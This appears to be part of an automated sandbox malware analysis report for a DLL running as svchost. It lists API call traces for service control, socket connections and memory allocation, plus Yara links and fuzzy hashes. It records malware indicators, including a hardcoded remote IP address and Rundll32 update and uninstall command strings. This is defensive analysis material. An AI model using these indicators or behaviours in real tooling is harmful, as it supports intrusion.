                                                                                          • API ID: AllocVirtualmemcpy$Sleep
                                                                                          • String ID: GW2$SGSWh5-$SPh\n
                                                                                          • API String ID: 1263862976-685354651
                                                                                          • Opcode ID: 3d25bdad23a031e0b48f737afd54ec3eb76eea0dcd6b60b485997711385254f5
                                                                                          • Instruction ID: 2f54f0f1129bbba38d4c41c0db51b56afb961a9339435d6967ffbe2678c67ccd
                                                                                          • Opcode Fuzzy Hash: 3d25bdad23a031e0b48f737afd54ec3eb76eea0dcd6b60b485997711385254f5
                                                                                          • Instruction Fuzzy Hash: E241F3B5104244BEF720DFA18CC6F7F7A6CEB457C4F10842AFA894548DCB76AE40A622
                                                                                          Function 10001ACF Relevance: 12.1, APIs: 8, Instructions: 55servicesleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 10001ADF
                                                                                          • OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 10001AF5
                                                                                          • QueryServiceStatus.ADVAPI32(00000000,?), ref: 10001B06
                                                                                          • ControlService.ADVAPI32(00000000,00000001,?), ref: 10001B1D
                                                                                          • Sleep.KERNEL32(0000000A), ref: 10001B2F
                                                                                          • QueryServiceStatus.ADVAPI32(00000000,?), ref: 10001B3A
                                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 10001B43
                                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 10001B4A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                                                                                          • String ID:
                                                                                          • API String ID: 2359367111-0
                                                                                          • Opcode ID: 5fba824a85b92acc79a789ef028bf042a0167ae6a51034b94a07b5d3b0519e81
                                                                                          • Instruction ID: 13eb0d6c039a265936ccbdc891ea19e15248044979c42994c6487f454c48f15c
                                                                                          • Opcode Fuzzy Hash: 5fba824a85b92acc79a789ef028bf042a0167ae6a51034b94a07b5d3b0519e81
                                                                                          • Instruction Fuzzy Hash: 87017531644627ABF7119BA09C89FFF7BBAEF0A7C1F204060FA01D509DEB648542D6A1
                                                                                          Function 10001445 Relevance: 10.6, APIs: 7, Instructions: 85networkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 1000180A: setsockopt.WS2_32(?,0000FFFF,00000080,00000000,00000004), ref: 1000182F
                                                                                            • Part of subcall function 1000180A: CancelIo.KERNEL32(?,?,10001455,00002256,00000000), ref: 10001838
                                                                                            • Part of subcall function 1000180A: InterlockedExchange.KERNEL32(?,00000000), ref: 10001844
                                                                                            • Part of subcall function 1000180A: closesocket.WS2_32(?), ref: 1000184D
                                                                                            • Part of subcall function 1000180A: SetEvent.KERNEL32(?,?,10001455,00002256,00000000), ref: 10001856
                                                                                          • ResetEvent.KERNEL32(?,00002256,00000000,00000000), ref: 10001458
                                                                                          • socket.WS2_32(00000002,00000001,00000006), ref: 10001469
                                                                                          • gethostbyname.WS2_32(?), ref: 1000147A
                                                                                          • htons.WS2_32(?), ref: 1000148F
                                                                                          • connect.WS2_32(?,00000002,00000010), ref: 100014AC
                                                                                          • setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 100014D1
                                                                                          • WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 10001502
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Eventsetsockopt$CancelExchangeInterlockedIoctlResetclosesocketconnectgethostbynamehtonssocket
                                                                                          • String ID:
                                                                                          • API String ID: 4281462294-0
                                                                                          • Opcode ID: 3bd37e16282c1c1f21b19040e991c0c37f16a42726fa5d42d22308dc76884aca
                                                                                          • Instruction ID: 8d33707021d861f585806a6466cff3f66270e93c65c897c0ed9a4eea2b4cd3d2
                                                                                          • Opcode Fuzzy Hash: 3bd37e16282c1c1f21b19040e991c0c37f16a42726fa5d42d22308dc76884aca
                                                                                          • Instruction Fuzzy Hash: 9421BD71500719BFE7109FA4CC84EEBBBF9EF09394F104529F602A62A4C7B29D449B20
                                                                                          Function 100012D4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54networkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 100012D9
                                                                                          • _CxxThrowException.MSVCRT(?,10005258), ref: 10001332
                                                                                          • WSAStartup.WS2_32(00000202,?), ref: 10001343
                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 10001350
                                                                                          • memcpy.MSVCRT(?,00000068,00000003), ref: 10001379
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateEventExceptionH_prologStartupThrowmemcpy
                                                                                          • String ID: hx
                                                                                          • API String ID: 80965288-1695387836
                                                                                          • Opcode ID: 77854b9b63fc0fb3e868ca2b5d078d50e29d64ea9dc30742ffd87570b9eaf05b
                                                                                          • Instruction ID: e29fc32a716e33b2e16fee5429824c3098a31f8f694cb1b228e84ed99c9fd0ff
                                                                                          • Opcode Fuzzy Hash: 77854b9b63fc0fb3e868ca2b5d078d50e29d64ea9dc30742ffd87570b9eaf05b
                                                                                          • Instruction Fuzzy Hash: 8211B4748013849EF710DBA8CD89BEEBBB8DF09384F50005DF141A7286DFB56A08CB62
                                                                                          Function 1000273D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33processCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          • Rundll32 "%s",DllUpdate %s, xrefs: 10002774
                                                                                          • Rundll32 "%s",Uninstall, xrefs: 10002792
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wsprintf$ExecFileModuleName
                                                                                          • String ID: Rundll32 "%s",DllUpdate %s$Rundll32 "%s",Uninstall
                                                                                          • API String ID: 4265364758-3622515909
                                                                                          • Opcode ID: 2fae55858e382da93d8a6581f30ac6264c287b13e5b54571d9062f30e9afb438
                                                                                          • Instruction ID: 96afaeef2140f7acea31c6041c278450ca2d3413692d0236748e955fccce9fd0
                                                                                          • Opcode Fuzzy Hash: 2fae55858e382da93d8a6581f30ac6264c287b13e5b54571d9062f30e9afb438
                                                                                          • Instruction Fuzzy Hash: 0FF01875400228AFFB10DB50CC8DFCA777DEB08384F604191F659D2065DBB19698CF91
                                                                                          Function 1000260E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 26sleepmemoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LocalAlloc.KERNEL32(00000040,00000229,?,100022D7,?), ref: 10002616
                                                                                          • memcpy.MSVCRT(00000001,103.36.221.195,00000228,?,100022D7,?), ref: 10002633
                                                                                          • LocalSize.KERNEL32(00000000), ref: 1000263C
                                                                                            • Part of subcall function 10001863: ??2@YAPAXI@Z.MSVCRT(1000381E,?,00000144,00000000,1000381E,000000C8,00000144), ref: 10001884
                                                                                            • Part of subcall function 10001863: memcpy.MSVCRT(00000000,000000C8,1000381E,?,00000144,00000000,1000381E,000000C8,00000144), ref: 1000189C
                                                                                            • Part of subcall function 10001863: ??3@YAXPAX@Z.MSVCRT(00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 100018F3
                                                                                            • Part of subcall function 10001863: ??2@YAPAXI@Z.MSVCRT(00000001,00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 100018FB
                                                                                            • Part of subcall function 10001863: memcpy.MSVCRT(00000000,000000C8,00000001,00000001,00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?), ref: 1000190A
                                                                                            • Part of subcall function 10001863: ??3@YAXPAX@Z.MSVCRT(00000000,00000144,00000001,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 10001932
                                                                                          • Sleep.KERNEL32(00000001,00000000,00000000), ref: 1000264F
                                                                                          • LocalFree.KERNEL32(00000000), ref: 10002656
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Localmemcpy$??2@??3@$AllocFreeSizeSleep
                                                                                          • String ID: 103.36.221.195
                                                                                          • API String ID: 3084024409-2989038800
                                                                                          • Opcode ID: 2ebc1bcf665d22d67c7a361327471c09cc11f5b44399916a7679a62a2e06e5b5
                                                                                          • Instruction ID: 6c6233c5ed4335591c5831c53d58df47d942e828471bf6846fd26331ce1e1182
                                                                                          • Opcode Fuzzy Hash: 2ebc1bcf665d22d67c7a361327471c09cc11f5b44399916a7679a62a2e06e5b5
                                                                                          • Instruction Fuzzy Hash: 1BE092750036317BF341ABA09C4DFCF3A6DEF097D1F044104FB49A5199CB51564187E6
                                                                                          Function 10001863 Relevance: 9.1, APIs: 6, Instructions: 100COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 100012A4: VirtualFree.KERNEL32(?,00000000,00008000,?,10001878,?,00000144,00000000,1000381E,000000C8,00000144), ref: 100012B6
                                                                                          • ??2@YAPAXI@Z.MSVCRT(1000381E,?,00000144,00000000,1000381E,000000C8,00000144), ref: 10001884
                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 100018F3
                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000001,00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 100018FB
                                                                                          • memcpy.MSVCRT(00000000,000000C8,00000001,00000001,00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?), ref: 1000190A
                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00000144,00000001,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 10001932
                                                                                          • memcpy.MSVCRT(00000000,000000C8,1000381E,?,00000144,00000000,1000381E,000000C8,00000144), ref: 1000189C
                                                                                            • Part of subcall function 1000104C: memcpy.MSVCRT(?,00000003,00000003,00000000,?,?,10001947,?,00000003,?,00000144,00000000,1000381E,000000C8,00000144), ref: 10001074
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: memcpy$??2@??3@$FreeVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 494799333-0
                                                                                          • Opcode ID: 4ee7b13994a7bebae5ea71dd6d5e065c25e5d167394b36d5181ca15b21c419c8
                                                                                          • Instruction ID: a26a835bd5f016d956b68753e1f5501337bc07bd69db5d8cf19c0b84b9b19e4d
                                                                                          • Opcode Fuzzy Hash: 4ee7b13994a7bebae5ea71dd6d5e065c25e5d167394b36d5181ca15b21c419c8
                                                                                          • Instruction Fuzzy Hash: B631CBB9601204BBFF01EB64DD92FEE77AAEF44380F004019F605A6186DFB4BB149751
                                                                                          Function 10002AC4 Relevance: 9.1, APIs: 6, Instructions: 51stringwindowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _strupr$MessageSendVisibleWindowlstrlenstrstr
                                                                                          • String ID:
                                                                                          • API String ID: 850376632-0
                                                                                          • Opcode ID: 863bd39a3c954a72feaba740ccb092445ef11d91041d151f256abd7524e25783
                                                                                          • Instruction ID: f84e90a798d893893a4456b5c45592e19e504f04fdea282cdc153707e49d09ee
                                                                                          • Opcode Fuzzy Hash: 863bd39a3c954a72feaba740ccb092445ef11d91041d151f256abd7524e25783
                                                                                          • Instruction Fuzzy Hash: 3001B9726002296FFF109F64DC49F9A7BBCEB04385F204076E705E6094DB71E9468BA4
                                                                                          Function 10003E12 Relevance: 9.0, APIs: 6, Instructions: 41COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeLibrary
                                                                                          • String ID:
                                                                                          • API String ID: 3664257935-0
                                                                                          • Opcode ID: f0b267456437bb5650b3bd9d655f830ec4ec3bf790c62446a31930fdfe0cb4b5
                                                                                          • Instruction ID: d8b8667a67b2f2557cad44f9379b5e8f255c0c6237c58758e20748922239760e
                                                                                          • Opcode Fuzzy Hash: f0b267456437bb5650b3bd9d655f830ec4ec3bf790c62446a31930fdfe0cb4b5
                                                                                          • Instruction Fuzzy Hash: A6F0EC706007459AEA61EE7ACC44B17F3ECEF90AD1B028929A451D3694DA74EC458960
                                                                                          Function 100026DF Relevance: 9.0, APIs: 2, Strings: 4, Instructions: 30stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: strlenwsprintf
                                                                                          • String ID: Group$Remark$SYSTEM\CurrentControlSet\Services\%s$encvbk
                                                                                          • API String ID: 350797232-3873049726
                                                                                          • Opcode ID: b298f06eb582685539f31f60401fdbef796c9698157982a35a7a39406c1ee736
                                                                                          • Instruction ID: a3fc7b85e27bf4a01dcc346c82e5e7340bd10ea751e75b0120d021e994437014
                                                                                          • Opcode Fuzzy Hash: b298f06eb582685539f31f60401fdbef796c9698157982a35a7a39406c1ee736
                                                                                          • Instruction Fuzzy Hash: CCF065B6800124B7FF10AB54DC4AFDA3B6DDB083D4F1040E1FE0966158EBB55A94CBD1
                                                                                          Function 1000389D Relevance: 8.9, APIs: 7, Instructions: 117memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E), ref: 100038D8
                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000004,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E), ref: 100038E8
                                                                                          • GetProcessHeap.KERNEL32(00000000,00000014,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E,?,10006E5C), ref: 100038F9
                                                                                          • HeapAlloc.KERNEL32(00000000,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E,?,10006E5C,?), ref: 10003900
                                                                                          • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E), ref: 10003924
                                                                                          • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E), ref: 10003933
                                                                                          • memcpy.MSVCRT(00000000,?,?,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E,?), ref: 10003944
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Alloc$Virtual$Heap$Processmemcpy
                                                                                          • String ID:
                                                                                          • API String ID: 2335822491-0
                                                                                          • Opcode ID: e49d25e9bb0d4a180f47fe763da8cbfb8d19a32eb96c44da1c7ada0cf7328320
                                                                                          • Instruction ID: eacb235572be496481c28daf470fd61b07f9ecf460b9dfe0afcc7509c1ddb230
                                                                                          • Opcode Fuzzy Hash: e49d25e9bb0d4a180f47fe763da8cbfb8d19a32eb96c44da1c7ada0cf7328320
                                                                                          • Instruction Fuzzy Hash: 88314A71600701AFE715CFA9CD85E6BBBECEF49794F118029F644DB285D7B0E9408BA4
                                                                                          Function 1000389C Relevance: 8.9, APIs: 7, Instructions: 115memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E), ref: 100038D8
                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000004,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E), ref: 100038E8
                                                                                          • GetProcessHeap.KERNEL32(00000000,00000014,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E,?,10006E5C), ref: 100038F9
                                                                                          • HeapAlloc.KERNEL32(00000000,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E,?,10006E5C,?), ref: 10003900
                                                                                          • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E), ref: 10003924
                                                                                          • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E), ref: 10003933
                                                                                          • memcpy.MSVCRT(00000000,?,?,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E,?), ref: 10003944
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Alloc$Virtual$Heap$Processmemcpy
                                                                                          • String ID:
                                                                                          • API String ID: 2335822491-0
                                                                                          • Opcode ID: 9aa3b273a59eb2c0b2545a37afc38cd619bd195e7d1346904624c1b6da4ac45c
                                                                                          • Instruction ID: 10317215f663cfab710d715b633d7b0dbc04a231647ffe3f91967b0172577e13
                                                                                          • Opcode Fuzzy Hash: 9aa3b273a59eb2c0b2545a37afc38cd619bd195e7d1346904624c1b6da4ac45c
                                                                                          • Instruction Fuzzy Hash: 69317A71600701AFEB15CBA8CD85F6BBBECEF49794F108029F645DB285D7B0E8008B64
                                                                                          Function 100011FB Relevance: 7.6, APIs: 5, Instructions: 66memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ceil.MSVCRT ref: 10001226
                                                                                          • _ftol.MSVCRT ref: 1000122E
                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00000000,?,?,10001712,00000003), ref: 10001251
                                                                                          • memcpy.MSVCRT(00000000,?,00000000,?,?,10001712,00000003), ref: 10001275
                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,?,10001712,00000003), ref: 10001287
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Virtual$AllocFree_ftolceilmemcpy
                                                                                          • String ID:
                                                                                          • API String ID: 3927456183-0
                                                                                          • Opcode ID: f94edee6810ba8cea6bfb4746a43b2bc9bf2551bc4d63573e388d815a9760473
                                                                                          • Instruction ID: ff1c2b162e375ad2b81c3d4b25a5517a05f38efa8821d55832f31a3c03b13b4e
                                                                                          • Opcode Fuzzy Hash: f94edee6810ba8cea6bfb4746a43b2bc9bf2551bc4d63573e388d815a9760473
                                                                                          • Instruction Fuzzy Hash: 3A11C1B1700304ABF7549F65CC86B9FBBE9EB447D1F108429F655C6284DA71A8008760
                                                                                          Function 10001155 Relevance: 7.6, APIs: 5, Instructions: 65memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ceil.MSVCRT ref: 10001187
                                                                                          • _ftol.MSVCRT ref: 1000118F
                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00000000,?,?,10001947,?,00000003,?,00000144), ref: 100011A3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual_ftolceil
                                                                                          • String ID:
                                                                                          • API String ID: 3317677364-0
                                                                                          • Opcode ID: 7f57421f4e8a0dbe28e4ec1d2025382d16bc9b97be7dafbce8d036dedad50421
                                                                                          • Instruction ID: 1b5d6cedb6f753cdbab920be1aa23ddc9916300482f626f48fbf4534a1b153b9
                                                                                          • Opcode Fuzzy Hash: 7f57421f4e8a0dbe28e4ec1d2025382d16bc9b97be7dafbce8d036dedad50421
                                                                                          • Instruction Fuzzy Hash: 29119EB1700700ABF7189F65CC85BDFBAE8EB447D1F10842DFB4AC6694EAB5E8008764
                                                                                          Function 100013B6 Relevance: 7.5, APIs: 5, Instructions: 38synchronizationnetworkCOMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 100013BB
                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,00000000,?,10002F56), ref: 100013DD
                                                                                          • CloseHandle.KERNEL32(?,?,10002F56), ref: 100013F3
                                                                                          • CloseHandle.KERNEL32(?,?,10002F56), ref: 100013FC
                                                                                          • WSACleanup.WS2_32 ref: 10001402
                                                                                            • Part of subcall function 1000180A: setsockopt.WS2_32(?,0000FFFF,00000080,00000000,00000004), ref: 1000182F
